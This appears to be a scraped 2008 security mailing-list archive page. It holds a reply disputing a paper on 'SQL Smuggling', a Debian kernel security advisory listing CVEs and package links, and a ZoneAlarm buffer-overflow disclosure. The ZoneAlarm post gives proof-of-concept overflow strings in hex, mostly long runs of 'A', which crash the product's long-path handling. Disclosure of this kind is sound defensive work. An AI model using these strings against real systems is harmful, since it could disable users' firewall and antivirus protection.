puts unicode_url(gets)
From: Tim [EMAIL PROTECTED]
Sent: 10 September 2008 00:34
To: [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com
Subject: Re: SQL Smuggling
We released a research paper a few months ago, regarding a sub-class
of SQL Injection that has not received attention till now. The crux is
that when it comes to SQLi, protection and detection do not typically
take the architecture into account; this can allow smuggling attacks
which are not blocked or discovered.
The paper can be found at:
http://www.ComsecGlobal.com/framework/Upload/SQL_Smuggling.pdf
From the paper:
This paper will present a new class of attack, called SQL Smuggling.
...
I don't see how this is a new class of attack. You've merely outlined
some techniques to bypass broken data validation routines. In SQL
injection, as with any injection vulnerability, the correct way to fix
it is to rely on the syntax of the language to encode data which may be
interpreted
[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1636-1[EMAIL PROTECTED] http://www.debian.org/security/ dann frazier Sep 11, 2008http://www.debian.org/security/faq - -- Package: linux-2.6.24 Vulnerability : denial of service/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2008-3272 CVE-2008-3275 CVE-2008-3276 CVE-2008-3526 CVE-2008-3534 CVE-2008-3535 CVE-2008-3792 CVE-2008-3915 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or leak sensitive data. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-3272 Tobias Klein reported a locally exploitable data leak in the snd_seq_oss_synth_make_info() function. This may allow local users to gain access to sensitive information. CVE-2008-3275 Zoltan Sogor discovered a coding error in the VFS that allows local users to exploit a kernel memory leak resulting in a denial of service. CVE-2008-3276 Eugene Teo reported an integer overflow in the DCCP subsystem that may allow remote attackers to cause a denial of service in the form of a kernel panic. CVE-2008-3526 Eugene Teo reported a missing bounds check in the SCTP subsystem. By exploiting an integer overflow in the SCTP_AUTH_KEY handling code, remote attackers may be able to cause a denial of service in the form of a kernel panic. CVE-2008-3534 Kel Modderman reported an issue in the tmpfs filesystem that allows local users to crash a system by triggering a kernel BUG() assertion. CVE-2008-3535 Alexey Dobriyan discovered an off-by-one-error in the iov_iter_advance function which can be exploited by local users to crash a system, resulting in a denial of service. CVE-2008-3792 Vlad Yasevich reported several NULL pointer reference conditions in the SCTP subsystem that can be triggered by entering sctp-auth codepaths when the AUTH feature is inactive. This may allow attackers to cause a denial of service condition via a system panic. CVE-2008-3915 Johann Dahm and David Richter reported and issue in the nfsd subsystem that may allow remote attackers to cause a denial of service via a buffer overflow. For the stable distribution (etch), these problems have been fixed in version 2.6.24-6~etchnhalf.5. We recommend that you upgrade your linux-2.6.24 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.5.dsc Size/MD5 checksum: 5107 77e0185b5d5efa18885eae513acffa6a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.5.diff.gz Size/MD5 checksum: 3932827 40cb2fb2852c48b6da11ef1e0c59a8fa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af Architecture independent packages: http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.5_all.deb Size/MD5 checksum:81100 0382c2c77051367e8efd9d3d933f85ef http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.5_all.deb Size/MD5 checksum: 4259616 a87291ee36a46fc9c5c040f83afa7f9f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.5_all.deb Size/MD5 checksum: 46858178 d62d102e8478bb14caa6d0303c68ff6b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.5_all.deb Size/MD5 checksum: 749438 9312478438ae81439074ceec72d3a349 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.5_all.deb Size/MD5 checksum: 1548872 1a56b95a09b2caf8e6347578755d5ba6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.5_all.deb Size/MD5 checksum:95464 9950e248bbe489b6fb60e3e9af1c alpha architecture (DEC Alpha)
ZoneAlarm Security Suite buffer overflow
Application: ZoneAlarm Security Suite OS: Windows Xp (All patches a day) -- 1 - Description 2 - Vulnerability 3 - POC/EXPLOIT -- Description The zonealarm is a known firewall, which in the version security suite brings some tools as an antivirus, antispam and so on. Details of the version ZoneAlarm Security Suite versión:7.0.483.000 Versión de TrueVector:7.0.483.000 Versión del controlador:7.0.483.000 Versión de motor anti-virus:3 Versión de motor antivirus:5.0.1.85 Versión de archivo DAT de firma de anti-virus 915051681 Versión de motor de protección contra programas espía:5.0.189.0 Versión de archivo DAT de firma de protección contra programas espía 01.200801.3195 Versión de AntiSpam 5.0.6.8903 -- Vulnerability The vulnerability is caused because the program can not analyze very long paths. This causes a buffer overflow with the possibility of execution of code. The flaw could be exploited by malware to leave without protection to the system for instance. -- POC/EXPLOIT Here you can view a video proof of concept http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf Strings ASCII: · AAA · AAA · AAA · · AAA · AAA · AAA · · A · AAA · AAA HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 ASCII: AAAAA HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 -- Juan Pablo Lopez Yacubian
